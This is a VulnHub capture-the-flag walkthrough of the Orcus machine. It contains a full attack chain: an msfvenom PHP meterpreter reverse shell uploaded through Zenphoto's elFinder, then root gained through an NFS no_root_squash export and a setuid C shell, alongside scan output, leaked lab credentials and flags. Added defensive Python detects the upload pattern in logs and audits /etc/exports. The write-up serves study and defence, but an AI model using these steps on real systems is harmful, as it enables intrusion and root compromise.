Orcus VulnHub Writeup

  1. Service discovery
  2. Port 80
  3. Zenphoto
  4. Elevation
  5. Last flag
  6. Summary

A set of machines from hackfest2016 landed recently. First up is Orcus by Viper.

Service discovery

root@kali:~# nmap -T4 -A -v -p0-65535 192.168.110.102

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-16 09:35 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating ARP Ping Scan at 09:35
Scanning 192.168.110.102 [1 port]
Completed ARP Ping Scan at 09:35, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:35
Completed Parallel DNS resolution of 1 host. at 09:35, 0.02s elapsed
Initiating SYN Stealth Scan at 09:35
Scanning 192.168.110.102 [65536 ports]
Discovered open port 443/tcp on 192.168.110.102
Discovered open port 139/tcp on 192.168.110.102
Discovered open port 110/tcp on 192.168.110.102
Discovered open port 993/tcp on 192.168.110.102
Discovered open port 143/tcp on 192.168.110.102
Discovered open port 111/tcp on 192.168.110.102
Discovered open port 80/tcp on 192.168.110.102
Discovered open port 995/tcp on 192.168.110.102
Discovered open port 22/tcp on 192.168.110.102
Discovered open port 445/tcp on 192.168.110.102
Discovered open port 53/tcp on 192.168.110.102
Discovered open port 2049/tcp on 192.168.110.102
Discovered open port 59908/tcp on 192.168.110.102
Discovered open port 46495/tcp on 192.168.110.102
Discovered open port 43740/tcp on 192.168.110.102
Discovered open port 44039/tcp on 192.168.110.102
Completed SYN Stealth Scan at 09:35, 2.36s elapsed (65536 total ports)
Initiating Service scan at 09:35
Scanning 16 services on 192.168.110.102
Completed Service scan at 09:35, 11.02s elapsed (16 services on 1 host)
Initiating OS detection (try #1) against 192.168.110.102
NSE: Script scanning 192.168.110.102.
Initiating NSE at 09:35
Completed NSE at 09:35, 8.75s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.03s elapsed
Nmap scan report for 192.168.110.102
Host is up (0.00032s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp    open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING STLS RESP-CODES UIDL AUTH-RESP-CODE TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after:  2026-10-09T03:44:10
| MD5:   ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      33448/udp  mountd
|   100005  1,2,3      59908/tcp  mountd
|   100021  1,3,4      44039/tcp  nlockmgr
|   100021  1,3,4      59276/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 have STARTTLS post-login listed Pre-login LITERAL+ OK capabilities ENABLE SASL-IR LOGIN-REFERRALS IDLE ID
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after:  2026-10-09T03:44:10
| MD5:   ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp   open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: more IMAP4rev1 have post-login listed capabilities Pre-login LITERAL+ OK SASL-IR ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS IDLE ID
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after:  2026-10-09T03:44:10
| MD5:   ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER PIPELINING RESP-CODES UIDL AUTH-RESP-CODE TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after:  2026-10-09T03:44:10
| MD5:   ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs_acl     2-3 (RPC #100227)
43740/tcp open  mountd      1-3 (RPC #100005)
44039/tcp open  nlockmgr    1-4 (RPC #100021)
46495/tcp open  mountd      1-3 (RPC #100005)
59908/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:33:F7:2B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 199.638 days (since Sun Aug 28 18:17:49 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -0s, deviation: 0s, median: -0s
| nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ORCUS<00>            Flags: <unique><active>
|   ORCUS<03>            Flags: <unique><active>
|   ORCUS<20>            Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name:
|   NetBIOS computer name: ORCUS
|   Workgroup: WORKGROUP
|_  System time: 2017-03-16T09:35:46-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.110.102

NSE: Script Post-scanning.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.01s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_  -0s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.52 seconds
           Raw packets sent: 65559 (2.885MB) | Rcvd: 65552 (2.623MB)

Port 80

The first target will be the Apache server running on port 80. I know that there are several entries in robots.txt, but for good measure I run dirsearch.

root@kali:~/dirsearch# python3 dirsearch.py -u 192.168.110.102 -e php

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5151

Error Log: /root/dirsearch/logs/errors-17-03-16_10-00-20.log

Target: 192.168.110.102

[10:00:20] Starting:
[10:00:20] 403 -  303B  - /.htaccess-dev
[10:00:20] 403 -  294B  - /.hta
[10:00:20] 403 -  304B  - /.htaccess.bak1
[10:00:20] 403 -  305B  - /.htaccess-marco
[10:00:20] 403 -  305B  - /.htaccess-local
[10:00:20] 403 -  304B  - /.htaccess.orig
[10:00:20] 403 -  303B  - /.htaccess.BAK
[10:00:20] 403 -  304B  - /.htaccess.save
[10:00:20] 403 -  301B  - /.ht_wsr.txt
[10:00:20] 403 -  306B  - /.htaccess.sample
[10:00:20] 403 -  303B  - /.htaccess.old
[10:00:20] 403 -  303B  - /.htaccessOLD2
[10:00:20] 403 -  302B  - /.htaccessOLD
[10:00:20] 403 -  303B  - /.htaccess.txt
[10:00:20] 403 -  305B  - /.htaccess_extra
[10:00:20] 403 -  302B  - /.htaccessBAK
[10:00:20] 403 -  300B  - /.htaccess~
[10:00:20] 403 -  304B  - /.htaccess_orig
[10:00:20] 403 -  303B  - /.htpasswd-old
[10:00:20] 403 -  302B  - /.htaccess_sc
[10:00:20] 403 -  298B  - /.htgroup
[10:00:20] 403 -  298B  - /.htusers
[10:00:20] 403 -  304B  - /.htpasswd_test
[10:00:20] 403 -  300B  - /.htpasswds
[10:00:21] 200 -   50KB - /CHANGELOG.md
[10:00:21] 200 -  750B  - /FCKeditor/
[10:00:21] 301 -  322B  - /FCKeditor  ->  http://192.168.110.102/FCKeditor/
[10:00:22] 200 -    2KB - /README.md
[10:00:23] 301 -  318B  - /admin  ->  http://192.168.110.102/admin/
[10:00:23] 200 -   49B  - /admin/
[10:00:23] 200 -   49B  - /admin/?/login
[10:00:23] 403 -  305B  - /admin/.htaccess
[10:00:23] 200 -   49B  - /admin/index.php
[10:00:25] 301 -  320B  - /backups  ->  http://192.168.110.102/backups/
[10:00:25] 200 -    1KB - /backups/
[10:00:26] 301 -  318B  - /files  ->  http://192.168.110.102/files/
[10:00:26] 200 -    1KB - /files/
[10:00:27] 200 -    4KB - /index.php
[10:00:27] 200 -  101B  - /index.html
[10:00:27] 200 -    4KB - /index.php/login/
[10:00:27] 301 -  320B  - /install  ->  http://192.168.110.102/install/
[10:00:27] 302 -    0B  - /install/  ->  ../index.php
[10:00:27] 301 -  323B  - /javascript  ->  http://192.168.110.102/javascript/
[10:00:28] 302 -    0B  - /login.php  ->  http://192.168.110.102/index.php?controller=login&action=showlogin
[10:00:28] 302 -    0B  - /login.php  ->  http://192.168.110.102/index.php?controller=login&action=showlogin
[10:00:29] 301 -  323B  - /phpmyadmin  ->  http://192.168.110.102/phpmyadmin/
[10:00:29] 200 -   10KB - /phpmyadmin/
[10:00:29] 200 -    1KB - /robots.txt
[10:00:30] 403 -  303B  - /server-status
[10:00:30] 403 -  304B  - /server-status/
[10:00:31] 200 -    0B  - /test.php
[10:00:31] 301 -  319B  - /themes  ->  http://192.168.110.102/themes/
[10:00:31] 302 -    0B  - /thumb.php  ->  /framework/core/assets/images/default_preview_notfound.gif
[10:00:31] 301 -  316B  - /tmp  ->  http://192.168.110.102/tmp/
[10:00:31] 200 -  934B  - /tmp/

Task Completed

In addition to the files and directories listed in robots.txt, I note that the directory /backups is discovered by dirsearch.

SimplePHPQuiz-Backupz.tar.gz    2016-10-31 20:29    210K
ssh-creds.bak                   2016-11-01 21:33    12

The file ssh-creds.bak is not readable; however, the file SimplePHPQuiz-Backupz.tar.gz is.

After downloading and extracting this file, we find the database credentials dbuser and dbpassword in the file includes/db_conn.php.

<?php

//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
    echo "Could not connect to MySql. Please try again";
    exit();
}

?>

In the previous directory listing, I note that phpmyadmin is available to us. We're able to log in to phpmyadmin using the above credentials. The databases are listed as follows.

Adem
information_schema
mysql
performance_schema
PHPFusion
phpmyadmin
quizdb
SimplePHPQuiz
sys
zencart
zenphoto

There's not a great deal of interest in any of these databases - most are empty, and the only one that has any content of potential interest is zencart. While we have access to mysql.user, it holds no users that would elevate our access further from phpmyadmin.

INSERT INTO `user` (`Host`, `User`, `authentication_string`) VALUES
('localhost', 'root', ''),
('viperhard', 'root', ''),
('127.0.0.1', 'root', ''),
('::1', 'root', ''),
('localhost', 'debian-sys-maint', '*58B9CCC97BEDA9955672ECB575F0D95B102FCC6F'),
('localhost', 'mysql.sys', '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE'),
('localhost', 'dbuser', '*6207EE3F049D8F87CC0B4BBB8814917B31FB8E4F'),
('localhost', 'phpmyadmin', '*4781D0CCF5870B70A6AACB8FF1E01BB9F619A6C6');

Zenphoto

After finding zenphoto available in the directory /zenphoto, we discover that it has not yet been installed. I waste no time and use the credentials previously discovered to set up zenphoto.

There do not appear to be any inherent vulnerabilities in the core install of zenphoto; however, there is a plugin named elFinder available to enable. The description of the plugin is as follows.

Provides file handling for the upload/files tab and the TinyMCE file browser.

After enabling the plugin, we are able to view, edit and create files via http://192.168.110.102/zenphoto/zp-core/zp-extensions/elFinder/filemanager.php?page=upload&tab=elFinder&type=files.

I create a meterpreter payload and upload it to themes/meterpreter.php.

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.103 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 27033 bytes

Time to start up our listener in msfconsole.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.110.103
LHOST => 192.168.110.103
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.110.103:4444
[*] Starting the payload handler...

I trigger the payload with a curl command.

root@kali:~# curl http://192.168.110.102/zenphoto/themes/meterpreter.php

We're rewarded with a meterpreter session.

[*] Meterpreter session 1 opened (192.168.110.103:4444 -> 192.168.110.102:39056) at 2017-03-20 15:40:03 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter >

I proceed to gain a shell, and find a flag in the /var/www directory.

meterpreter > shell
Process 2800 created.
Channel 0 created.
ls -lah /var/www
total 16M
drwxr-xr-x  4 root     root     4.0K Oct 22 14:58 .
drwxr-xr-x 14 root     root     4.0K Oct 28 14:02 ..
-rw-r--r--  1 root     root     5.5M Dec 17  2015 9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
-rw-r--r--  1 root     root     1.2M Apr 28  2014 a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
-rw-r--r--  1 root     root     8.8M Dec  1  2015 b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
-rw-------  1 www-data www-data   33 Oct 22 13:46 flag.txt
d-wx--x--x 15 www-data www-data 4.0K Mar 16 09:44 html
drwxrwxr-x  8 root     root     4.0K Sep 21  2015 zenphoto-zenphoto-1.4.10
cat /var/www/flag.txt
868c889965b7ada547fae81f922e45c4
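
As an added example (not part of the original writeup), here is detection logic for the sequence in this section: a client that uses the elFinder file manager and shortly afterwards requests a .php file straight out of the themes/ directory. The elFinder and themes/ paths are the ones shown above; the Apache log lines, byte counts and the second client address are constructed.

```python
"""Detect the Zenphoto/elFinder web-shell pattern from this writeup in Apache
access logs: a client that touches the elFinder file manager and shortly after
requests a .php file directly under the themes/ directory."""
import re
from datetime import datetime, timedelta

# Apache combined log format, capturing only the fields we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
ELFINDER = '/zenphoto/zp-core/zp-extensions/elFinder/'   # path used in the writeup
THEME_PHP = re.compile(r'^/zenphoto/themes/[^?]*\.php(\?|$)')
WINDOW = timedelta(minutes=30)   # how long after elFinder use a themes/ .php hit is suspicious

# Constructed sample lines modelled on the steps of the writeup (not real logs).
SAMPLE_LOG = """\
192.168.110.103 - - [20/Mar/2017:15:38:10 -0400] "GET /zenphoto/zp-core/admin.php HTTP/1.1" 200 5123
192.168.110.103 - - [20/Mar/2017:15:38:52 -0400] "GET /zenphoto/zp-core/zp-extensions/elFinder/filemanager.php?page=upload&tab=elFinder&type=files HTTP/1.1" 200 7310
192.168.110.103 - - [20/Mar/2017:15:40:03 -0400] "GET /zenphoto/themes/meterpreter.php HTTP/1.1" 200 0
192.168.110.50 - - [20/Mar/2017:15:41:00 -0400] "GET /zenphoto/themes/default/styles.css HTTP/1.1" 200 8890
192.168.110.50 - - [20/Mar/2017:16:30:00 -0400] "GET /zenphoto/themes/default/theme.php HTTP/1.1" 404 210
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def find_webshell_drops(log_text, window=WINDOW):
    """Return [(ip, elfinder_time, php_path)] for every successful direct request
    to a .php under themes/ by a client that used elFinder within `window` before."""
    last_elfinder = {}   # ip -> time of that client's most recent elFinder request
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec['path'].startswith(ELFINDER):
            last_elfinder[rec['ip']] = rec['ts']
        elif THEME_PHP.match(rec['path']) and rec['status'] < 400:
            seen = last_elfinder.get(rec['ip'])
            if seen is not None and rec['ts'] - seen <= window:
                alerts.append((rec['ip'], seen, rec['path']))
    return alerts
```

Run over the sample, only the 192.168.110.103 sequence is reported; the 404 on theme.php from a client that never used elFinder is not.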

Elevation

Time to elevate our shell from www-data to root.

After checking the other services (ssh, bind, dovecot, samba, nfs, mountd), the only one that jumped out at me was nfs. During enumeration via our shell, I also discovered a couple of postgresql instances running, but these yielded no secrets.

Before moving on, I'll note that I discovered what could be considered another flag in /etc/kippo/data/userdb.txt.

cat /etc/kippo/data/userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

I proceed to list the mounts available to us on the target.

root@kali:~# showmount -e 192.168.110.102
Export list for 192.168.110.102:
/tmp *

Time to mount this on our testing machine.

root@kali:~# mkdir /tmp/orcus
root@kali:~# mount -t nfs 192.168.110.102:/tmp /tmp/orcus
root@kali:~# ls -lah /tmp/orcus
total 36K
drwxrwxrwt 9 root root 4.0K Mar 16 17:25 .
drwxrwxrwt 9 root root 4.0K Mar 20 09:25 ..
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .font-unix
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .ICE-unix
drwx------ 3 root root 4.0K Mar 16 17:23 systemd-private-1f6894c2997b4017a4f2b5ec650a3234-dovecot.service-Qos2Dc
drwx------ 3 root root 4.0K Mar 16 17:23 systemd-private-1f6894c2997b4017a4f2b5ec650a3234-systemd-timesyncd.service-IslOZP
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .Test-unix
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .X11-unix
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .XIM-unix

So - we've mounted the /tmp directory on the target. Who is nfs running as on the target?

ps aux | grep nfs
root      1402  0.0  0.0      0     0 ?        S<   09:34   0:00 [nfsd4_callbacks]
root      1405  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
root      1407  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
root      1408  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
root      1409  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
root      1410  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
root      1411  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
root      1415  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
root      1416  0.0  0.0      0     0 ?        S    09:34   0:00 [nfsd]
www-data  2873  0.0  0.1   3028   848 ?        S    10:38   0:00 grep nfs

And what is our nfs config?

cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)

Awesome - so we can chmod and chown to our heart's content.
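
As an added check (example code written for this page, not from the original post), the Python audit below parses an /etc/exports file and flags exactly the combination found here: a wildcard client, rw, and no_root_squash. The sample file is constructed; only its /tmp line is taken from the target.

```python
"""Audit /etc/exports for the weakness that gave away root on Orcus: a wildcard,
read-write export of a world-writable directory with no_root_squash."""
import re

# Constructed sample for this example: the /tmp line is the one found on the
# target, the other lines are made up to show tighter exports for comparison.
SAMPLE_EXPORTS = """\
# /etc/exports: see exports(5)
/tmp *(rw,no_root_squash)
/srv/backups 192.168.110.0/24(ro,sync,root_squash,no_subtree_check)
/srv/upload  192.168.110.103(rw,sync,no_subtree_check) *(ro,sync)
/srv/legacy
"""

# A client spec is a host, network, netgroup or wildcard, optionally followed
# by a parenthesised, comma-separated option list.
CLIENT_RE = re.compile(r'([^\s(]+)(?:\(([^)]*)\))?')
# Options nfsd applies when a line does not say otherwise, and their opposites.
DEFAULTS = {'ro', 'root_squash', 'secure'}
OPPOSITES = (('ro', 'rw'), ('root_squash', 'no_root_squash'), ('secure', 'insecure'))


def parse_exports(text):
    """Return a list of (path, [(client, effective_option_set), ...])."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()        # drop comments and blanks
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        clients = []
        for client, opts in CLIENT_RE.findall(rest):
            effective = set(DEFAULTS)
            for opt in (o.strip() for o in opts.split(',') if o.strip()):
                for a, b in OPPOSITES:             # an explicit option beats its opposite
                    if opt in (a, b):
                        effective.discard(a)
                        effective.discard(b)
                effective.add(opt)
            clients.append((client, effective))
        if not clients:                            # bare path: exported to every host
            clients.append(('*', set(DEFAULTS)))
        entries.append((path, clients))
    return entries


def is_wildcard(client):
    return '*' in client or '?' in client          # '*' or patterns like '*.example.com'


def audit_exports(text):
    """Map (path, client) -> sorted issue tags; exports with no issue are omitted."""
    report = {}
    for path, clients in parse_exports(text):
        for client, opts in clients:
            tags = []
            if 'no_root_squash' in opts:   # a client's uid 0 stays uid 0 on the server,
                tags.append('no_root_squash')   # so it can plant root-owned setuid files
            if is_wildcard(client):
                tags.append('any_host')
                if 'rw' in opts:
                    tags.append('rw_any_host')
            if tags:
                report[(path, client)] = sorted(tags)
    return report
```

The no_root_squash tag is the one that matters for what follows: with the default root_squash, the chown to root over the mount would not succeed. Mounting the server's own /tmp with nosuid would additionally stop a planted setuid binary from working there.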

I upload a very simple program to /tmp/shell.c that will set our gid and uid to 0 and execute /bin/bash.

#include <unistd.h>

main( int argc, char ** argv, char ** envp )
{
    setgid(0);
    setuid(0);
    system("/bin/bash", argv, envp);
    return 0;
}

I proceed to compile the program.

gcc -o shell shell.c
shell.c:3:1: warning: return type defaults to 'int' [-Wimplicit-int]
 main( int argc, char ** argv, char ** envp )
 ^
shell.c: In function 'main':
shell.c:7:2: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]
  system("/bin/bash", argv, envp);
  ^

From our testing machine, and via the nfs mount, I chown the shell binary to root, and set the suid and sgid bits.

root@kali:/tmp/orcus# chown root:root shell
root@kali:/tmp/orcus# chmod +s shell

Finally, I execute the program on the target.

ls -lah
total 48K
drwxrwxrwt  9 root     root     4.0K Mar 16 10:40 .
drwxr-xr-x 24 root     root     4.0K Oct 30 23:05 ..
drwxrwxrwt  2 root     root     4.0K Mar 16 09:34 .ICE-unix
drwxrwxrwt  2 root     root     4.0K Mar 16 09:34 .Test-unix
drwxrwxrwt  2 root     root     4.0K Mar 16 09:34 .X11-unix
drwxrwxrwt  2 root     root     4.0K Mar 16 09:34 .XIM-unix
drwxrwxrwt  2 root     root     4.0K Mar 16 09:34 .font-unix
-rwsr-sr-x  1 root     root     7.3K Mar 16 10:40 shell
-rw-r--r--  1 www-data www-data  139 Mar 16 10:40 shell.c
drwx------  3 root     root     4.0K Mar 16 09:34 systemd-private-4fdc5fc8b7114fac9e9b67df64887946-dovecot.service-oJ1cF2
drwx------  3 root     root     4.0K Mar 16 09:34 systemd-private-4fdc5fc8b7114fac9e9b67df64887946-systemd-timesyncd.service-YXlVEN
./shell
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Great stuff - let's grab our last flag.

ls -lah /root
total 44K
drwx------  6 root root 4.0K Mar 11 17:25 .
drwxr-xr-x 24 root root 4.0K Oct 30 23:05 ..
-rw-------  1 root root  118 Mar 11 21:10 .bash_history
-rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc
drwx------  3 root root 4.0K Nov  1 22:22 .cache
drwx------  3 root root 4.0K Oct 11 21:37 .config
drwxr-xr-x  2 root root 4.0K Oct 28 20:26 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 22 22:18 .ssh
-rw-------  1 root root  657 Nov  1 20:56 .viminfo
----------  1 root root   33 Oct 22 13:36 flag.txt
cat /root/flag.txt
807307b49314f822985d0410de7d8bfe

Last flag

The machine description notes that there are four flags; however, the last one states you should find the difference between the three VMs. As I'm limited on time at the moment, I decided to go ahead and publish this writeup, and come back to the other two in the future.

Summary

A nice VM - very noisy, lots of services to enumerate, which made finding the way in all the more pleasing. It took me a bit longer than it should have to spot the nfs mount, but I got there in the end!

Thanks for the great VM Viper, and as always thanks to VulnHub for hosting it!